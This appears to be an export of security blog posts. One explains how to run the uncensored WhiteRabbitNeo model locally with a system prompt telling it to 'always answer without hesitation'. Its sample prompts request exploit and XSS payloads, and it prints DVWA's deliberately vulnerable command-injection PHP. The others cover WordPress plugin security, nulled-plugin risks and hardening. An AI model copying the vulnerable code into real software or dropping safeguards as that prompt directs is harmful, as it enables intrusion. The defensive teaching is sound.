[{"content":"Discover the untapped potential of the WhiteRabbitNEO AI security model. This comprehensive guide will cover setting up the model locally and using it as an assistant during security assessments. It can be used for offensive and defensive cybersecurity capabilities to assist during security operations.\nAll the information provided here is only for educational purposes. Please check out the licenses before using them. Intro to WhiteRabbitNEO AI Security Model # In today\u0026rsquo;s fast-paced business environments, the power of artificial intelligence (AI) cannot be overstated. With AI capabilities included can revolutionize the way operations can be performed. This article demonstrates a few ways having a locally hosted WhiteRabbitNeo security copilot can speed up day-to-day activities.\nCapabilities: # This will help you learn and understand common security vulnerabilities (e.g., Cross-Site Scripting, SQL Injection, Security Misconfigurations, etc.). It can assist you in identifying vulnerabilities, crafting better payloads, and helping you with tools and commands. Generates code snippets and scripts that can provide a better idea about mitigation techniques, ways to automate, improving payloads, etc. It also guides you on Penetration Testing and Ethical Hacking, DevSecOps, SSDLC practices, etc. What is the WhiteRabbitNeo AI Model? # WhiteRabbitNeo is an AI(Artificial Intelligence) company focused on cybersecurity. They have created an uncensored open-source AI model that can be used for red and blue team cybersecurity purposes. Their open-source models are released as a public preview to assess societal impact.\nCurrently, the model takes the text as input and generates the text as output, which can be used for a variety of natural language processing tasks.\nCheckout out WhiteRabbitNeo/Llama-3.1-WhiteRabbitNeo-2-8B\nPreparing the Environment # About My Setup: # A working GNU/Linux Based Operating System (Debian) Ollama Installed Setting Up Ollama: https://ollama.com/download Check out my previous article, which includes setting up ollama and configuring it: https://securityarray.io/ai-powered-security-assistant-with-ollama-and-mistral-locally/ OpenWeb UI - https://openwebui.com/ Memory (RAM) \u0026gt;= 16 GB (Recommended) Disk Free Space \u0026gt;= 80 GB (Recommended) Model: Llama-3.1-WhiteRabbitNeo-2-8b Downloading the WhiteRabbitNeo-2-8B Model # Let us go ahead and download the model WhiteRabbitNeo/Llama-3.1-WhiteRabbitNeo-2-8B from the huggingface repository.\nTo download, ensure the git and the git-lfs are installed. Then proceed with the git clone.\n​#Ensure git-lfs is installed sudo apt install git-lfs sudo apt install git-lfs #Cloning the Repository from HuggingFace git clone https://huggingface.co/WhiteRabbitNeo/Llama-3.1-WhiteRabbitNeo-2-8B Depending on your internet speed, this may take time as it needs to download the large safe-tensor files. Verify all the files are successfully downloaded.\n$ tree Llama-3.1-WhiteRabbitNeo-2-8B/ Llama-3.1-WhiteRabbitNeo-2-8B/ ├── config.json ├── generation_config.json ├── model-00001-of-00004.safetensors ├── model-00002-of-00004.safetensors ├── model-00003-of-00004.safetensors ├── model-00004-of-00004.safetensors ├── model.safetensors.index.json ├── README.md ├── special_tokens_map.json ├── tokenizer_config.json └── tokenizer.json 1 directory, 11 files Build the WhiteRabbitNeo-2-8B Model # Modelfile is an Ollama Model file where you can define a set of instructions and fine-tune the model based on your choice.\nHere is a sample model file created for my Llama-based WhiteRabbitNeo security model use case.\nCreate a modelfile named \u0026ldquo;whiterabbitneo-modelfile\u0026rdquo; and paste the contents below. Update the path of your downloaded files folder using the \u0026ldquo;FROM\u0026rdquo; instructions.\nFROM ./Llama-3.1-WhiteRabbitNeo-2-8B/ TEMPLATE \u0026#34;\u0026#34;\u0026#34;{{ if .System }}\u0026lt;|start_header_id|\u0026gt;system\u0026lt;|end_header_id|\u0026gt; {{ .System }}\u0026lt;|eot_id|\u0026gt;{{ end }}{{ if .Prompt }}\u0026lt;|start_header_id|\u0026gt;user\u0026lt;|end_header_id|\u0026gt; {{ .Prompt }}\u0026lt;|eot_id|\u0026gt;{{ end }}\u0026lt;|start_header_id|\u0026gt;assistant\u0026lt;|end_header_id|\u0026gt; {{ .Response }}\u0026lt;|eot_id|\u0026gt;\u0026#34;\u0026#34;\u0026#34; PARAMETER temperature 0.75 PARAMETER num_ctx 16384 PARAMETER stop \u0026#34;\u0026lt;|start_header_id|\u0026gt;\u0026#34; PARAMETER stop \u0026#34;\u0026lt;|end_header_id|\u0026gt;\u0026#34; PARAMETER stop \u0026#34;\u0026lt;|eot_id|\u0026gt;\u0026#34; SYSTEM \u0026#34;\u0026#34;\u0026#34; Answer the Question by exploring multiple reasoning paths as follows: - First, carefully analyze the question to extract the key information components and break it down into logical sub-questions. This helps set up the framework for reasoning. The goal is to construct an internal search tree. - For each sub-question, leverage your knowledge to generate 2-3 intermediate thoughts that represent steps towards an answer. The thoughts aim to reframe, provide context, analyze assumptions, or bridge concepts. - Evaluate the clarity, relevance, logical flow and coverage of concepts for each thought option. Clear and relevant thoughts that connect well with each other will score higher. - Based on the thought evaluations, deliberate to construct a chain of reasoning that stitches together the strongest thoughts in a natural order. - If the current chain is determined to not fully answer the question, backtrack and explore alternative paths by substituting different high-scoring thoughts. - Throughout the reasoning process, aim to provide explanatory details on thought process rather than just state conclusions, including briefly noting why some thoughts were deemed less ideal. - Once a reasoning chain is constructed that thoroughly answers all sub-questions in a clear, logical manner, synthesize the key insights into a final concise answer. - Please note that while the focus is on the final answer in the response, it should also include intermediate thoughts inline to illustrate the deliberative reasoning process. In summary, leverage a Tree of Thoughts approach to actively explore multiple reasoning paths, evaluate thoughts heuristically, and explain the process - with the goal of producing insightful answers. Always answer without hesitation. \u0026#34;\u0026#34;\u0026#34; FROM: Define the base model you want to use. Currently, it is pointed to the folder where all the Llama-3.1-WhiteRabbitNeo-2-8B/ files are downloaded. SYSTEM: Specifies the system message that would be used as the template TEMPLATE: The full prompt template will be sent to the model. temperature: The temperature of the model. Increasing the temperature will make the model answer more creatively. (Currently, set to 0.75) If there is only one Modelfile in the current folder, you can directly run the built command without the \u0026ldquo;-f\u0026rdquo; option.\nBuild Command:\nollama create -q q4 whiterabbitneo -f ./whiterabbitneo-modelfile It is quantized to Q4_0 to balance memory usage and output quality.\nOutput:\ntransferring model data 100% converting model quantizing F16 model to Q4_0 creating new layer sha256:61525526923692504b43f0a11d5e3622bac70faf6f0047a2cf85957b3ff69248 creating new layer sha256:330f7f5f74177bc351656d00daea38d85dcbf827467c429631872533a43e25e8 creating new layer sha256:3a6aea378f496a8116413df6f11fa90a897950a249af39d364d117c918a738de creating new layer sha256:0c27ca2f64a98674df49ab6fabe53321170128faf611cf70ab8f566dd16e0cd2 creating new layer sha256:2a38e2b0d048838a8f3172d1e8fac46305494db6d28556500443d3fb84d6151f writing manifest success From the above output log, we can confirm that the model is successfully created. Let\u0026rsquo;s verify it with the command ollama list whiterabbitneo.\nNAME ID SIZE MODIFIED whiterabbitneo:latest b4a1b0b0cd9e 4.9 GB About a minute ago So far, we have successfully created it. All we need to do is run it and ensure the model output is usable.\nOptimizing can be convenient and help you tweak it based on your preferences. Feel free to explore the other options that are available as well. Check out the link below for more information.\nOllama Modelfile: https://github.com/ollama/ollama/blob/main/docs/modelfile.md Alternative 1: Using the WhiteRabbitNeo Model created by other users # Yes, it is possible. Other users have already created the models and uploaded them onto the Ollama registry; you can download them and give them a try as well. It might contain the latest and oldest build models as well.\nClick on the \u0026ldquo;models\u0026rdquo; and search for the \u0026ldquo;whiterabbit\u0026rdquo;. You will find many.\nFigure 1: Search for WhiteRabbitNeo Models Alternative 2: Using the WhiteRabbitNeo Model created by other users on HuggingFace # Yes, there are other users who have created the models and uploaded them to the hugging face repository. We will take one example from TheBloke.\nhttps://huggingface.co/TheBloke/WhiteRabbitNeo-13B-GGUF\nThis user has already created the model and uploaded it to the repo.\nThis is a different revision of the WhiteRabbitNeo model. Figure 2: Download the WhiteRabbitNeo GGUF file from the TheBloke shared repository. The creation process is the same as what we covered. You need to update the FROM instruction in the model file to point to the downloaded GGUF file, then run the \u0026ldquo;ollama create\u0026rdquo; command.\nRunning the WhiteRabbitNeo-2-8B Model # In my case, I am using the WebUI docker instance, so I will reload it to fetch information about the latest models we have created. In some cases, we also need to restart the docker service to display it on the WebUI interface.\nYou could run from CLI as well using the below command.\nollama run whiterabbitneo:latest For readability, I prefer using the open-webui.\nAfter loading the open-webui, click \u0026ldquo;Select a Model\u0026rdquo; and search for \u0026ldquo;whiterabbitneo:latest\u0026rdquo; to ensure it is selected for the following prompts.\nFigure 3: Selecting the WhiteRabbitNeo Model Evaluating the WhiteRabbitNeo-2-8B Model for Security Use Cases # Below are some of the use cases demonstrated for example purposes. You could go ahead and try out the different queries and let me know your comments on them.\nQuestion 1: What is an XXE vulnerability? How can it be exploited? and How to mitigate it with detailed examples. # Output:\nFigure 4: XXE Response Question 2: Find if the code below is vulnerable. If so, write an exploitable proof of concept payload using the curl command. # DVWA - Command Injection PHP Code:\n\u0026lt;?php if( isset( $_POST[ \u0026#39;Submit\u0026#39; ] ) ) { // Get input $target = $_REQUEST[ \u0026#39;ip\u0026#39; ]; // Determine OS and execute the ping command. if( stristr( php_uname( \u0026#39;s\u0026#39; ), \u0026#39;Windows NT\u0026#39; ) ) { // Windows $cmd = shell_exec( \u0026#39;ping \u0026#39; . $target ); } else { // *nix $cmd = shell_exec( \u0026#39;ping -c 4 \u0026#39; . $target ); } // Feedback for the end user $html .= \u0026#34;\u0026lt;pre\u0026gt;{$cmd}\u0026lt;/pre\u0026gt;\u0026#34;; } ?\u0026gt; Output:\nFigure 5: Command Injection Response Question 3: Write an XSS payload for the following vulnerable field without using the script tags. # \u0026lt;input type=email name=\u0026#34;email\u0026#34; value=\u0026#34;\u0026#34;\u0026gt; Output:\nFigure 6: Response for XSS Payload Question 4: How do you perform a vulnerability scan with nmap NSE scripts? # Output:\nFigure 7: NMAP Response Question 5: Generate a sample vulnerability reporting template for Command Injection Vulnerability # Output:\nFigure 8: Sample Vulnerabilty Report Template WhiteRabbitNeo is a model built explicitly for cybersecurity use cases. It is not perfect and can be fine-tuned and improved. Additionally, the responses need not be the same as above. Here is another model on the HuggingFace of SecurityLLM. Check out the model file and give it a try. The process of creating it is similar to the above.\nZySec-AI/SecurityLLM\nKeep watching for more models on AI security at HuggingFace.\nConclusions: # So far in this article, we have seen how one of the security AI models (e.g., WhiteRabbitNeo) can be set up locally and used for security use cases. Open-source AI models for security are still in the beta stages, and different researchers are evaluating and improving them. These models still have to be improved a lot. It is all about how good the training data is. Feel free to try out and experiment with different modes and check which best meets your security needs.\nAdditional Information and References: # Hugging Face - https://huggingface.co/WhiteRabbitNeo WhiteRabbitNeo Discord: https://discord.gg/8Ynkrcbk92 Ollama Modelfile: https://github.com/ollama/ollama/blob/main/docs/modelfile.md ","date":"28 September 2024","externalUrl":null,"permalink":"/unlocking-the-power-of-whiterabbitneo-ai-security-model-with-ollama/","section":"Posts","summary":"","title":"Unlocking the power of WhiteRabbitNeo AI Security Model with Ollama","type":"posts"},{"content":"Looking to improve the security of your WordPress website? This step-by-step guide will walk you through how to install the Shield Security security plugin for WordPress. One of the tools to secure your WordPress site from potential threats.\nWhat is Shield Security? # Shield Security is an Intrusion Detection and Prevention security plugin for WordPress that helps secure your website from malicious traffic. It has malicious traffic monitoring capability, Blocks spam bots and content, Disable anonymous REST API access, 2FA support, and many other features designed to keep your website safe and secure.\nKey features and benefits # Automatic IP Blocking: The website owner can check and set the offence count in the settings. After reaching the count, the website will automatically block all malicious traffic Site Traffic Monitoring: Continuously monitor all site activity and get security insights into your WordPress website in real time. Malware Scanner: The plugin scans your website for known malware and helps keep your website free from viruses.(pro* feature) Brute Force and Spam Protection: SecureShield helps protect your website from brute force attacks by rate-limiting attempts and enforcing strong protection. Two-Factor Authentication: The plugin also offers two-factor authentication, an extra layer of security for admin user accounts. You can learn more about the complete features of ShieldSecurity on their website.\nPre-Installation Steps # Before installing the ShieldSecurity WordPress plugin, taking a few pre-installation steps is important to ensure a smooth and safe process.\nIn this article, we will focus only on the free version of ShieldSecurity.\nBackup your WordPress website # It\u0026rsquo;s always a good practice to create a backup of your WordPress website before installing any new plugins. This ensures that you can restore your website to its previous state in case anything goes wrong during installation.\nUpdate WordPress and all plugins # Ensure your WordPress core installation and all other plugins are up to date. Running the latest versions of WordPress and plugins helps ensure compatibility and security.\nInstalling Shield Security Plugin # Log into your WordPress admin account, navigate to \u0026ldquo;Plugins\u0026rdquo; -\u0026gt; \u0026ldquo;Add Plugins\u0026rdquo;, and search for \u0026ldquo;Shield Security\u0026rdquo;.\nFigure 1: Install Shield Security Plugin Once you find the \u0026ldquo;Shield Security\u0026rdquo; plugin, click the \u0026ldquo;Install Now\u0026rdquo; button.\nFigure 2: Activate Shield Security WordPress Plugin After installation, click the \u0026ldquo;Activate\u0026rdquo; button to enable the plugin.\nConfigure Shield Security # A plugin configuration wizard is loaded, which will quickly help you navigate and set up the required features.\nFigure 3: Shield Security - Getting Started A Shield Security menu will be displayed. Using the WordPress dashboard, you can Navigate to the Shield Security Plugin. A Dedicated menu to manage all \u0026ldquo;Shield Security\u0026rdquo; plugin features. Click on the \u0026ldquo;Next Step\u0026rdquo; to go ahead and quickly enable the security features needed. Warning: Note the setup wizard options may change Subscribing to Newsletter # The first step involves subscribing to a newsletter. You can sign up or click on \u0026ldquo;Next Step.\u0026rdquo;\nActivate License: # Figure 4: Activate Your License The next step prompts activating the \u0026ldquo;ShieldPRO\u0026rdquo; license. As this article only focuses on the free version, I will skip it and click \u0026ldquo;Next Step.\u0026rdquo;\nChoose a Initial Security Profile # If you\u0026rsquo;re a first-time user or just want a quick setup, the \u0026ldquo;Shield Security\u0026rdquo; plugin provides multiple profiles to choose from.\nFigure 5: Choose a Shield Security Profile I recommend reviewing the options that each profile enables or disables before you select one. It\u0026rsquo;s often best to get started with the \u0026ldquo;Light\u0026rdquo; or \u0026ldquo;Medium\u0026rdquo; profile, as you can change this setting at any time.\nSometimes, stricter security features can conflict with or \u0026ldquo;break\u0026rdquo; other functionality on your site. Therefore, it\u0026rsquo;s safer to start with the \u0026ldquo;Light\u0026rdquo; or \u0026ldquo;Medium\u0026rdquo; profile, test your site to ensure everything works, and then move toward implementing a more robust security profile.\nSetting up Shield Admin PIN # Figure 6: Setup Admin PIN The application displays the form to set up a plugin PIN in the \u0026ldquo;Security Admin\u0026rdquo; section. This would be an added layer of protection for admins, ensuring only the authorized person can access or modify the security setting.\nKey in the PIN, Confirm the PIN, and click on \u0026ldquo;Turn On Security Admin.\u0026rdquo; A message stating that the PIN has been successfully set will be displayed, and you will be taken to Bot Settings.\nBot Blocking # Figure 7: Bot Blocking Wizard The next setting is about how to handle the Bots and Malicious traffic. Identifying the malicious traffic patterns and bad bot behaviour ruleset is already taken care of by the plugin vendor.\nAs a website owner, based on your site traffic and user patterns, decide after how many offences you would like to block the IP. The default offence limit is 10. I have set the offence limit to 5 for strict security and the Block duration to 1 week.\nTo activate it, click on \u0026ldquo;Set IP Blocking Options\u0026rdquo;. After 5 malicious attempts, the IP address will be blocked for 1 Week.\nThe Whitelist option is also available, where admins\u0026rsquo; and security researchers\u0026rsquo; IPs can be whitelisted as needed.\nThe option \u0026ldquo;Use CrowdSec Blocklists\u0026rdquo; is also an added benefit.\nIf an attacker\u0026rsquo;s IP is flagged on your site for offences, it is shared with CrowdSec, and similarly, other websites\u0026rsquo; flagged IP addresses are shared with your site. This helps to block malicious attempts at early stages proactively.\nBrute Force Login Protection # Figure 8: Brute Force Login Protection One of the most common attacks on a WordPress website is the automated Brute Force attack. The attacker tries to find the valid credentials that match a known user name or by blindly trying with a huge list of usernames and passwords. This happens continuously each and every day.\nShield Security Brute Force Login Protection will detect automated attacks and block them from exploitation.\nMake sure to \u0026ldquo;Turn On - Protect my WordPress login from automated attacks\u0026rdquo;, click on \u0026ldquo;Set Login Protection\u0026rdquo;.\nSometimes, the admin may not be able to log in. Don\u0026rsquo;t forget to whitelist the admin IP address. Block Spam Comments # Figure 9: Block Spam Comments Spam comments are another common problem among WordPress sites. The free version also covers this.\nPlease check on \u0026ldquo;Turn On - Block automated SPAM comments\u0026rdquo; and click on \u0026ldquo;Set Comment SPAM Protection\u0026rdquo; to enable.\nClick \u0026ldquo;Go to Shield Overview\u0026rdquo; on the final thank you page.\nShield Security Dashboard # Figure 10: Shield Security Dashboard The \u0026ldquo;Security Overview\u0026rdquo; dashboard is a place where you can see all the info about security happenings on your site.\nThe top graph displays total number of Login Blocks, Bot Detection, Offenses, Connection Killed, IP Blocked etc in past 7 days. Additionally the security summary of our website.\nOne of the major reason I found to useful about this plugin compared to WordFence is for real-time threat protection and less memory usage compared to it.\nEnable Auto Updates # Just make sure to enable the \u0026ldquo;auto-updates\u0026rdquo; for Shield Security plugin, so you don\u0026rsquo;t need to update every time manually. I have been using it for more than couple of years and haven\u0026rsquo;t see any breakages so far.\nI hope the above information helps secure your site. The above configuration can quickly help to secure your WordPress site from good number of attacks. In future articles will be posting about the detailed hardening steps using Shield Security plugin soon.\nShield Security Help # Check out the Shield Security -Getting Started Guide for more help information.\nConclusion # Securing the WordPress website is an important factor for website owners. With the increasing attacks on WordPress, proactive measures like this help secure your online assets.\nSecure Shield is a free, real-time WordPress security plugin that enhances your website\u0026rsquo;s security. It provides many features, such as blocking malicious comments, bots, attackers, firewall protection, and Two-Factor Authentication.\nDon\u0026rsquo;t wait until it\u0026rsquo;s too late; enable it now to reduce security attacks.\n","date":"7 May 2024","externalUrl":null,"permalink":"/how-to-install-and-configure-shield-security-step-by-step-guide/","section":"Posts","summary":"","title":"How to Install and Configure Shield Security: Step-by-step guide","type":"posts"},{"content":"In today\u0026rsquo;s digital world, WordPress is one of the most widely used Content Management Systems (CMS) for quickly creating websites or blogs. WordPress powers more than 10 million websites across the internet. One of the core reasons behind its popularity is the availability of numerous plugins that extend its functionality and make it user-friendly.\nBelow are statistics on security vulnerabilities based on WordPress components by wpscan.\nFigure 1: WordPress Vulnerable Components Source: WPScan From the above screenshot, we can see that 94% of Vulnerabilities are found in WordPress plugins. Using nulled plugins is one among them. Nulled WordPress plugins/themes can expose your website to significant security risks and vulnerabilities.\nThis article will provide a comprehensive understanding of what nulled plugins and themes are, their security risks, the alternatives, when you can use them, etc.\n📖 What are Nulled Plugins and Nulled Themes? # A Nulled plugin is a modified version of open-source or premium WordPress plugins distributed for free or at a negligible cost over the Internet through unofficial channels that anyone can download and use.\nSecurity threats apply to both WordPress plugins and themes. For premium plugins, the original code is altered, and all license limitations will be nullified, so you can freely use all the premium capabilities without paying any extra money.\nIn the case of open-source plugins, additional features not part of the official plugin are added to attract users to download and use.\n🧲 Why are nulled plugins/themes so attractive? # The WordPress ecosystem is a huge market, and you might need to decide which plugin suits your requirements. Most free plugins are good for getting started, but as you progress, you might see limitations and require additional features.\nThe above requirements might make you consider premium plugins an option. But again, you might need to get a premium plugin for a theme, a premium plugin for forms, etc., as the requirements keep going.\nConsidering the Hosting, Plugins, Themes, Development, Official Support, etc. It might look expensive, and as humans, we normally look for ways to cut costs or get discounts.\nCost Effective: # Nulled plugins sound like a good deal for small website owners who want to get their site up and running without spending a lot of money.\nSelected Features # Users might need only a few essential features rather than paying for all options. One Subscription - Access to Many Premium Plugins # There are a few unofficial sources on the internet, where you can pay once and access multiple premium nulled plugins without paying individually for each plugin. Challenging Experiences # Users might have faced frustrating experiences with unresponsive support. Issues due to account lockouts or inability to register valid user accounts. License activation problems, payment-related issues, etc. Assumed Time Saving # Used might believe it can cut the development efforts and build the website faster. Overall, Nulled plugins might seem like a good deal for free, but remember they may contain malware, a backdoor or other security vulnerabilities bundled inside them, which can harm your website with various security threats.\n🔓 Security Threats Associated with Nulled Plugins # In this section will dig further and understand the security risks associated with the nulled plugins:\nOutdated Security Patches # Official plugin developers patch security loopholes when they receive them. You will miss the patching updates. Missing security patches can leave your website unprotected, and attackers use this opportunity to compromise the site with known security vulnerabilities.\nMalicious Code Injection # One of the major threats associated with nulled WordPress plugins or themes is the possibility of injecting malware inside the code.\nBackdoor Access: The malicious code is injected and can silently provide access to your website for attackers. Attackers can use it to execute Remote Code Execution (RCE) and completely control your website. The single most common type of backdoor belonged to a PHP backdoor uploader found on 8.68% of remediated websites, while the most persistent backdoor (removed from more than 180,000 files last year) was WordPress specific and concealed within nulled themes. Its ability to self-replicate once it has established a footprint and layers of obfuscation makes it especially challenging to pinpoint and remove.\nFrom Sucuri - Hacked Website Report\nOpen Redirection Attack (Redirection Hack): Whenever users visit your website, the injected code redirects them to a malicious website, with or without clicking any link. This is called an open-redirection attack. Ransomware Attack: The malicious code injected inside the application will encrypt all files on the server and/or database. To regain access to those encrypted files, you must pay the attacker a ransom to obtain the decryption key. Spread Virus: Infected sites can spread the virus as well, and some advanced malware can even self-replicate and use your site as a medium to compromise other systems. Denial of Service (DOS) Attacks: The infected website can be used by attackers to launch a denial-of-service attack against other sites, which can even lead to blacklisting or marking your domain as spam. etc. Data Breach # Another major issue with the nulled plugin is the theft of your website data. An attacker might steal sensitive information such as usernames, passwords, payment-related details (if you are using e-commerce), etc.\nData Breaches can cost you a lot when you need to deal with legal consequences and damages. This would also impact your business reputation and trust. Sometimes, it can also lead to privacy issues. Malware can silently harvest your users\u0026rsquo; data and sell it to third-party vendors. 🛡️ Case Study - Criyasoft # Criyasoft is one of the client\u0026rsquo;s educational websites. It is used to demonstrate the functionalities development in WordPress and is always kept online for students\u0026rsquo; reference.\nRecently, it became the victim of an open-redirection attack. After 4 levels of redirections, it will take genuine users to a casino website.\nWhat is the Impact? # The \u0026ldquo;About\u0026rdquo; page link is tampered with, and whenever a visitor clicks it, it will redirected multiple times and take the user to a casino website\nFigure 2: A Blocked - First Level Redirection Attempt What is the root cause? # After analyzing the site, I found a couple of main reasons, which are listed below.\nOutdated Plugins and Themes - Both plugins and themes are not updated regularly.\nDuring the initial analysis, I discovered that it was just an ad-tracking link or that it was due to outdated plugins that have known security vulnerabilities. Updated all the plugins and themes. Ensured all was fixed, as it was no longer reproducible.\nAfter a few days, the attack pattern started to repeat again, and once it started impacting other page links, I realized it was some malicious behaviour impacting navigating menu links.\nAfter thoroughly evaluating each installed plugin and theme, I discovered that the client installed one of the nulled plugins for quick educational purposes instead of purchasing one that contained malicious code.\nNovashare nulled plugin is used - A nulled WordPress social share plugin is being used.\nAfter cleaning up the nulled plugin files, the site is back to normal, with continuous security monitoring enabled to prevent further attacks.\nHow was it fixed? # I scanned it with malware-scanning plugins to find the root cause. (Used Malcare)\nFigure 3: Use Malcare Post confirmation removed the Novoshare nulled plugin completely, deleted all its files and updated all the themes and plugins. Additional enabled \u0026ldquo;auto-updates\u0026rdquo; for all non-customized plugins and themes.\nLastly, I configured the free \u0026ldquo;ShieldSecurity\u0026rdquo; plugin to monitor real-time security alerts and prevent them from further impacting the website.\n⛔ Additional Reasons to Avoid Nulled Plugins? # Below are some additional trust concerns you might consider before using any of the nulled plugins. We don\u0026rsquo;t know what is inside the code, and we need to be prepared for any unexpected behaviours that can cause the site to crash or impact its availability.\nFlagged by Search Engines - Google # If Google finds any malicious behaviour on your website, an additional flag is displayed below your domain with the message \u0026ldquo;This site may be hacked.\u0026rdquo; This indicates that users should avoid visiting the Website as malicious activity has been spotted.\nFigure 4: Google-Flagging Suspicious Website If you believe you are a victim, check out Google Support for fixing.\nRecovering from Nulled WordPress Plugin Damage # Restoring your website after discovering it is hacked or causing unexpected behaviour is more time-consuming.\nRestore Backup: Maintaining regular backups can help you quickly restore the existing snapshots by identifying the impacted behaviour early.\nScanning for Malware or Seeking Professional Assistance: For hacked websites, it\u0026rsquo;s possible to mitigate the damage and regain control. You need to set up malware scanning solutions to identify infected files like \u0026ldquo;Sucuri\u0026rdquo;, \u0026ldquo;WordFence\u0026rdquo;, \u0026ldquo;Malcare\u0026rdquo;, etc. Additionally, don\u0026rsquo;t hesitate to seek professional assistance if required.\nTime-Consuming: As mentioned earlier, using nulled WordPress plugins or themes might seem time-saving, but damage control requires a lot more time and resources to restore the website to normal.\n⚠️Remember, official authors or vendors don\u0026rsquo;t support nulled plugins. Even if they would like to offer, they might have limited knowledge.\nI hope the above information can help you to decide and take respective action with respective to Nulled WordPress plugins or themes.\n👍 Best place for Plugins and Themes # Finding safe and reliable WordPress plugins is easy. There are many free and paid premium options for securely accessing your website.\nWordPress Plugins - All WordPress Plugins Directory Figure 5: WordPress Plugins Directory WordPress Themes - All WordPress Themes Directory Additional Tips # For each WordPress plugin or theme, check their reviews or visit its home page, and ensure you are purchasing only from official authors\u0026rsquo; sites. Figure 6: Theme Home Page and Reviews EnvatoElements - Another common place where you can find WordPlugins and Themes. 🤔 Still Using Nulled Plugins? # If you use nulled plugins on production websites, the transition steps below will be helpful, as they can still pose security risks.\nScan for known Vulnerabilities or Malware\nAntivirus and antimalware companies work around the clock to find new malware behaviours and patterns and update their signatures database.\nYou can leverage the free online malware scans such as \u0026ldquo;Sucuri\u0026rdquo;,\u0026quot;WordFence\u0026quot;, \u0026ldquo;Malcare\u0026rdquo;, \u0026ldquo;VirusTotal\u0026rdquo;, etc., to check the nulled plugins if it does do contain malware.\nYou could also check out [[./wordpress-scan-for-vulnerabilities-a-comprehensive-guide-for-site-security.org][WordPress Scan for Vulnerabilities a comprehensive guide for site security]] to learn more about scanning your WordPress site for vulnerabilities. Once you are confident that no malicious patterns are found, proceed with the next steps of the transition. If any are found, make sure to clean up before proceeding. Transition to Free or Premium Plugins: # Transitioning away from nulled plugins is crucial for maintaining the security and integrity of your WordPress site. The below steps can help you ensure a smooth migration to premium or free plugins with minimal disruption.\nBackup Your Website: Ensure complete site backup is taken to prevent potential data loss. Test and Validate alternate plugins: Ensure all features and functionalities work as intended with the new plugins. Remove Nulled Plugins: After successfully evaluating new plugins, safely remove the nulled plugins from your website, eliminating any potential security risks associated with their usage. Publish Changes: Push all the updated changes into the production environment and ensure that all the functionalities are working as expected. 📝 Conclusion # The WordPress nulled plugins or themes might seem an attractive alternative to paying for premium features, but it\u0026rsquo;s critical to weigh the security risks associated with their use. The potential harm they can cause to your website security is more, including reputational damage, a drop in your site rankings, a decrease in revenue, etc. Opting for free or trial versions and ensuring all the plugins and themes are up-to-date can minimize security threats.\n🙋 FAQs # What are nulled WordPress Plugins? # A Nulled plugin is a modified version of open-source or premium WordPress plugins distributed for free or at a negligible cost over the Internet through unofficial channels that anyone can download and use.\nAre nulled plugins safe to use? # No, and It should never be installed in production environments.\nWhat are the security risks associated with using nulled plugins? # It can be used as a medium for injecting and spreading malware and exploiting your website with known security vulnerabilities. It may also lead to data theft.\nHow can I avoid using nulled plugins? # Download and install plugins from reputed sources like the WordPress plugin directory and trusted marketplaces.\n🔗 Additional References: # Why You Should Stop Using Nulled WordPress Themes and Plugins Why you should avoid using Nulled WordPress themes and plugins ","date":"12 April 2024","externalUrl":null,"permalink":"/security-threats-of-nulled-wordpress-plugins-and-themes-uncovering-the-hidden-dangers/","section":"Posts","summary":"","title":"Security Threats of Nulled WordPress Plugins and Themes: Uncovering the Hidden Dangers","type":"posts"},{"content":"Discover the essential tips and best practices for enhancing the Security of WordPress Sites. Owners can analyze security risks, install recommended plugins, monitor continuously, and tweak configurations, which can help keep your sites safe from potential threats.\nThe major focus of this article is to provide detailed and step-by-step instructions to help website owners take action with easy-to-follow steps. Even non-technical users would also be able to follow along and secure your WordPress sites.\nUnderstanding the Importance of WordPress Security # It is reasonable for users to think that WordPress\u0026rsquo;s security must be taken care of by the provider itself. Let\u0026rsquo;s understand how the WordPress ecosystem works.\nAbout WordPress Software # WordPress is a dynamic open-source content management system that is freely available to anyone who wants to set up a publishing website.\nThe WordPress core is continuously hardened with all the vulnerabilities that have been identified and reported as part of OWASP Top 10. Also, the recommended security best practices are provided for authors developing third-party plugins and themes.\nThe WordPress Team\u0026rsquo;s responsibility covers identifying and resolving the security issues in the core software provided. It\u0026rsquo;s a community project that is used across 10 million websites on the internet. Any programmer can create a third-party plugin or theme based on their needs.\nFigure 1: WordPress Security From above, even after providing the secure guidelines and getting the code reviewed by volunteers, sometimes the security bugs can be missed, or new bugs found need to be updated accordingly.\nTo proactively mitigate security vulnerabilities before attackers find them, the WordPress Security team even runs the Bug Bounty program at HackerOne as an additional measure to report any security vulnerabilities identified by security researchers and make the platform more secure.\nWordPress security teams even go beyond to remove the vulnerable plugin from the directory if the plugin owner doesn\u0026rsquo;t fix or fix it themself in extreme cases.\nThird-party plugins and themes are reviewed for security to a certain extent. In addition to WordPress software, the security of the underlying operating system used, configurations, database servers, secure file transfers, TLS security, and web servers are also equally important.\nThe WordPress team is actively working on mitigating security defects in WordPress Core, Plugins, and Themes. However, the security of all underlying technologies and ensuring all the updates are patched falls under the Owner\u0026rsquo;s responsibility.\nIf your hosting provider takes care of your underlying tech stack, it is your responsibility to ensure the core, themes, and plugins are updated and downloaded from recommended websites.\nAbout Managed WordPress # When you come to Managed WordPress (i.e., wordpress.com), You just need to register, pay according to your package preference, and start publishing right away.\nManaged WordPress uses the same WordPress Core Software. The underlying technology, like setting up software and managing the web server and other resources, is completely handled by the Automattic team.\nAuthors need to focus only on creating content for their niche.\nThe Vital Need for Security # Based on the above choices, the security requirements do vary. A managed service is the best option for most website owners and companies. However, there are cases where the website owners require more customizability or manage multiple websites. In those cases, the users prefer the self-hosted version of WordPress.\nGoing forward, we will focus only on the security needs of self-hosted WordPress websites. We will set up a WordPress site and start securing it step by step.\nCybercriminals are constantly looking for new ways to exploit vulnerabilities and compromise website security. Any security weakness on site can be an opportunity for attackers. As a WordPress website owner, securing the business and customer data hosted on your website is the most crucial.\nSucuri ranked WordPress as the most infected CMS website in 2022 by Sucuri. Below are statistics on vulnerabilities based on WordPress components by wpscan.\nFigure 2: Vulnerable WordPress Components Most of the vulnerabilities were found in third-party plugins, and a few of them are in the themes. Attackers leverage these vulnerabilities to gain unauthorized access to your website, spread malware, steal sensitive information, or even disrupt the functionality of your site. As a result, proactive efforts can help you to secure your website.\nDefense in Depth: Security is always about minimizing the risks by adding as many layers of protection as possible. It\u0026rsquo;s more of a risk-reduction strategy.\nBoth technical and non-technical users can follow the content covered in this article.\nIf, by any chance, you are using another third-party vendor to manage \u0026ldquo;WordPress\u0026rdquo; for you? check out their support page to understand what is covered in terms of security and what needs to be taken care of by yourself.\nBackup your WordPress site # Before making any changes to your website, the 